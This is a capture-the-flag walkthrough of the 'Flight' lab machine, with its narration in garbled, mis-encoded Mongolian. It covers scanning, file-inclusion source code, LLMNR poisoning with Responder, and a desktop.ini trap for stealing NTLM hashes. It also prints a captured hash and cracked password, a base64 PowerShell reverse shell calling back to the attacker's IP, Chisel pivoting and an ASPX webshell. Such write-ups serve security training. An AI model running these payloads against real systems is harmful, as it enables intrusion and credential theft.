โ๏ธFlight
File Disclosure, Enumeration, LLMNR Poisoning, Pivoting, RunasCS.EXE
Nmap-ะณ ะฐัะธะณะปะฐะถ scanning ั ะธะนััะฝ. ะัะดััะถ ำฉำฉั ะทำฉะฝะดำฉำฉ Scanner ะฐัะธะณะปะฐั ะฑะพะปะพะผะถัะพะน ัาฏาฏ. ะะธะนัะปัะณ 22, 21, 23-ั ะฟะพััััะด ั ะฐะฐะปััะฐะน ะฑะฐะนัะฐะฝ ะฑำฉะณำฉำฉะด ัะพะฝะธัั ะพะป ัะฐััะฐะฝ ะฟะพัั ะฝั 445 ( SMB ), 389 ( LDAP ) ะฑะฐะนะปะฐะฐ
โโโ(rootใฟkali)-[~]
โโ# nmap -A -T5 -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49697/tcp open unknown
49709/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds
Subdomain-ััะดัะณ Wordlist-ััั ั ะฐะนัะฐะฝ. ะะธะปััะฝ ะพะปะพะฝ ะธะปััั ะณะฐััะฐะฝ ะฑำฉะณำฉำฉะด าฏาฏะฝััั school ัะพะฝะธัั ะพะปัะพะน ัะฐะฝะฐะณะดะฐะฐะด ัััััะฐะฝ.
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://flight.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000624: 200 90 L 412 W 3996 Ch "school"

Subdomain-ะณ ะพะปัะพะฝ ัััะฐะฐั ะผัะดััะถ Directory bruteforce ั ะธะนั ั ัััะณััะน.
dirsearch -u http://school.flight.htb
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt
Target: http://school.flight.htb/

Home button ะดััั ะดะฐัะฐั
ะฐะด LFI ะฑะฐะนะถ ะฑะพะปะพั
ะพะพั /index.php?view=home
ะณัััะฝ ะฟะฐัะฐะผะตัั ะณะฐัั ะธัััะฝ. ะัั
ะดัั ัะฝะณะธะนะฝ ../../../../etc/passwd
ัะฒััะปะฐั
ะฐะด Suspicious Activity Blocked response-ะณ ั
ะฐัััะปัะฐะฝ.

?view=
-ะณ ะฐัะธะณะปะฐะฐะด ััั
ะฐะนะฝ ั
ััะดััะณ ำฉำฉัะธะนะณ ะฝั ะดััะดะฐะถ Source Code-ะณ ั
ะฐััะฐะฝ.

<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
(strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
(strpos(urldecode($_GET['view']),'\\')!==false)||
(strpos(urldecode($_GET['view']),'htaccess')!==false)||
(strpos(urldecode($_GET['view']),'.shtml')!==false)
){
echo "<h1>Suspicious Activity Blocked!";
echo "<h3>Incident will be reported</h3>\r\n";
}else{
echo file_get_contents($_GET['view']);
}
}else{
echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>

Source Code-ะณ ั ะฐัะฒะฐะป LFI-ั ะดะฐะผะถััะปะถ Windows-ะฝ Share-ะปาฏาฏ ั ะฐะปะดะปะฐะณะฐ ั ะธะนั ะฑะพะปะพะผะถัะพะนะณ ั ะฐัะถ ะฑะพะปะฝะพ. ะญะฝัั าฏาฏ ั ะฐะปะดะปะฐะณัะณ LLMNR Poisoning ะณัะดัะณ ะฑำฉะณำฉำฉะด Poisoning ั าฏััะปัะธะนะณ ั าฏัััั ะธะปะณััะปะณาฏาฏะปััะด Response ะดััั ะฝั ััั ะฐะนะฝ ัะธััะตะผะธะนะฝ ะฝััั าฏะณะธะนะฝ Hash ััะณัะณ capturing ั ะธะนะถ ะฐะฒะฐั ะฑะพะปะพะผะถัะพะน ะฑะฐะนะดะฐะณ.

responder -I tun0 -wPv




ะะฐ ะผัะดััะถ ะพะปะถ ะฐะฒัะฐะฝ Hash ััะณะฐะฐ ัะฐะนะปะฐั ัะฝ ััะปะด John ะฐัะธะณะปะฐัะฐะฝ. ะญะฝัั าฏาฏ Hash ะฝั NTLMv2 ัะพัะผะฐััะฐะน ะฑะฐะนะดะฐะณ.
svc_apache --> S@Ss!K@*t13

ะะปะถ ะฐะฒัะฐะฝ ะฝััั าฏะณัั ะฐัะธะณะปะฐะถ Share-ะด ะฑาฏััะณัะปััะน ั ัััะณะปัะณัะดะธะนะฝ ะผัะดััะปะปะธะนะณ Enumeration ั ะธะนััะฝ.
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users

ะฅัััะณะปัะณัะดะธะนะฝ ะฝััะธะนะณ ะฐัะธะณะปะฐะถ Bruteforce ั ะธะนั ะธะนะฝ ััะปะด ะฝะธะนะปาฏาฏะปััะด ะฝัะณ าฏะณะธะนะฝ ัะฐะฝ ะฑะพะปะณะพัะพะฝ.


ะฅัััะณะปัะณัะดะธะนะฝ ะฝัั ะฑะพะปะพะฝ ะพะปะถ ะฐะฒัะฐะฝ ะฝััั าฏะณัั ะฐัะธะณะปะฐะฐะด Enumeration ั ะธะนะถ S.Moon ั ัััะณะปัะณั ัะฝัั าฏาฏ ะฝััั าฏะณััะน ัะฐะฐัะถ ะฑะฐะนะณะฐะฐะณ ะพะปัะพะฝ.
crackmapexec smb flight.htb -u user.txt -p 'S@Ss!K@*t13' --continue-on-success

psexec-ะณ ะฐัะธะณะปะฐะฐะด ะพัะพั ะณัััะฝ ะฑะพะปะพะฒั Access Denied ะฐะปะดะฐะฐ ำฉะณัำฉะฝ. ะขัะณัั ััั s.moon ั ัััะณะปัะณั Access ั ะธะนั ััั ะณาฏะน ะณัะดะณะธะนะณ ั ะฐัะถ ะฑะพะปะฝะพ. ะขัะณะฒัะป ััั ะธะนะฝ ัาฏะฒัะธะฝ ะฝั ั ะฐะฝะณะฐะปััะฐะน ั าฏััั ั ัััะณะปัะณัะธะนะฝ ะผัะดััะปะปะธะนะณ ะพะปะถ ะฐะฒัั.
impacket-psexec flight.htb/s.moon@g0.flight.htb

mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\10.10.14.22\test >> desktop.ini
attrib +s +h desktop.ini

IconResource ั ัััะณั Share-ะปาฏาฏ ั ะฐะฝะดะฐั IP ั ะฐัะณ ะฑะพะปะพะฝ Folder ะฝัััั ะทะฐะฐะถ ำฉะณัะฝำฉำฉั NTLM creds Steal ั ะฐะปะดะปะฐะณัะณ ะฑาฏััะฝ ั ะธะนั ะฑะพะปะพะผะถัะพะน ะฑะพะปะฝะพ. ะญะฝัั าฏาฏ desktop.ini ัะฐะนะปัะณ ำฉะผะฝำฉ ะฝั ั ะฐะฝะดะฐะถ ะฑะฐะนัะฐะฝ ััั ััััั SMB-ัาฏาฏ ั ะฐะฝะดะฐะฐะฝ put ั ะธะนะถ ำฉะณัำฉะฝ.


ะญะฝั าฏะตะด ะผัะดััะถ tun0 ะธะฝัะตัััะนั ะดััั Poisoning request ัะธะดััะด Listening ั ะธะนััะฝ ะฑะฐะนั ัััะพะน. ะััั าฏะณะธะนะฝ Hash ััะณัะณ ะพะปะพะพะด ะผำฉะฝ ะป Crack-ะดะฐะฐะด C.Bum ั ัััะณะปัะณัะธะนะฝ ะฝััั าฏะณะธะนะณ ะพะปะฝะพ.
c.bum::flight.htb:4cd27f636efc3257:7F64B4D7A6217B4730D74EF1E01203C5:0101000000000000809D337E9380D901C51E38F813A6CDA300000000020008003000570044004E0001001E00570049004E002D00320052004F00560058004E003900550038004A00540004003400570049004E002D00320052004F00560058004E003900550038004A0054002E003000570044004E002E004C004F00430041004C00030014003000570044004E002E004C004F00430041004C00050014003000570044004E002E004C004F00430041004C0007000800809D337E9380D90106000400020000000800300030000000000000000000000000300000E227B834CC2C6B7192EFB78D231DCFC9EAB20E4ED178B616C3D6C6DCDD6462A90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320032000000000000000000

john bum --wordlist=/usr/share/wordlists/rockyou.txt

smbclient //flight.htb/Web -U c.bum

ะะฐ ะฑะธะด ะฝะฐั SMB-ััั ะดะฐะผะถััะปะถ ั าฏัััะฝ ัะฐะนะปะฐะฐ ะฑะฐะนััััะปะฐั ะฑะพะปะพะผะถัะพะนะณ ะผัะดััะฝ ัััะฐะฐั ะผะธะฝะธะน ั ัะฒัะด ะฑะพะป ัั ะปััะด ััั ะฐะนะฝ ัะตัะฒะตัะปาฏาฏ ะดัััะฐะน Webshell-ัั ะฑะฐะนััััะปะถ Comfortable ะพััะธะฝะณ ะฑาฏัะดาฏาฏะปะดัะณ ะดะฐัะฐะฐ ะฝั ั ะพะปะฑะพะปั ัะพะณัะพะพั Initial Access-ะณ ั ะธะนั ะธะนะณ ั ะธัััะดัะณ.

Initial Access ั ะธะนั ะดัั Powershell ะฐัะธะณะปะฐัะฐะฝ. Powershell-ะฝ Base64 encode ั ะธะนััะฝ Payload-ะณ ะฐัะธะณะปะฐะถ ัั ะฝะธะน ั ะฐะฝะดะฐะปััะณ ะพะปะถ ะฐะฒัะฐะฝ.

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAyACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Initial Access
ะพะปะถ ะฐะฒัะฐะฝั ะดะฐัะฐะฐ ะพะดะพะพ ะฐะถะธะปะปะฐะถ ะฑะฐะนะณะฐะฐ าฏะนะปัะธะปะณััะฝาฏาฏะด ัะผะฐั ัำฉะปำฉะฒััะน ะฑะฐะนะณะฐะฐะณ ั
ะฐัะฒะฐะป LISTENING
ะณะพัะธะผัะพะน ะผะฐั ะพะปะพะฝ ะฟะพัั ะดััั ัะตัะฒะธัาฏาฏะด ะฐะถะธะปะปะฐะถ ะฑะฐะนัะฐะฝ ะฑำฉะณำฉำฉะด ัะดะณััั าฏะนะปัะธะปะณััะฝาฏาฏะดะธะนะณ ำฉำฉั ะดััััั ะฐะถะธะปะปััะปะถ
ะฏะผะฐั ัะผะทัะณ ะฑะฐะนะดะฐะปัะฐะน ะฑะฐะนะฝะฐ ะฒั?
ะฏะฐะถ ัะฐะฐัะฐะฐ ะฑััะฐะด าฏะนะปัะธะปะณัััาฏาฏ ัะธะปะถะธั
ะฒั?
ะณัั
ะผัั ะฐัััะดะปัะณ ัะธะนะดัั
ะธะนะฝ ััะปะด Pivoting ั
ะธะนััะฝ ะฑะฐะนะณะฐะฐ ัาฏาฏ.

Chisel
-ะณ ะฐัะธะณะปะฐะถ ัาฏะปะถััะฝะด Pivoting
ั
ะธะนะฝั

Chisel
ะฝั 2 ัำฉัำฉะป ะฑะฐะนะดะฐะณ ะฑำฉะณำฉำฉะด ัะฝั ัะดะฐะฐ ะฑะธ Windows-ะด ะทะพัะธัะปะถ ะณะฐัะณะฐัะฐะฝ ั
ัะฒะธะปะฑะฐััะณ ะฐัะธะณะปะฐัะฐะฝ.
chisel-ะณ ะฐัะธะณะปะฐั ะทะฐะฐะฒะฐั:
Client ัะฐะปะดะฐะฐ:
.\chisel.exe client 10.10.14.22:9999 R:8000:127.0.0.1:8000
Server ัะฐะปะดะฐะฐ:
chisel server --reverse -p 9999
ะะฐ ำฉำฉั ะดััััั าฏะนะปัะธะปะณััะณ ะฝั ะพัััะปัะฝั ะดะฐัะฐะฐ .aspx
ะฐะฟะฟะปะธะบะตะนัะฝ ะฑะฐะนัะฐะฝ ัััะฐะฐั ASPX ะดััั ะฑะธัััะฝ Webshell-ะณ ะฐัะธะณะปะฐะฒ.
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ะะฐ ััะณััะด าฏาฏะฝััั ัะฐะฐัะฐะฐ ะตั ะฝั ะฐะผะฐัั ะฐะฝ ะฑาฏะณะดััััั ัะฝัั าฏาฏ ััั าฏาฏะดะธะนะณ ะฐัะธะณะปะฐะฐะด ั ัะปะฑะฐั Privilege Escalation ั ะธะนั ะฑะพะปะพะผะถัะพะน
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
Last updated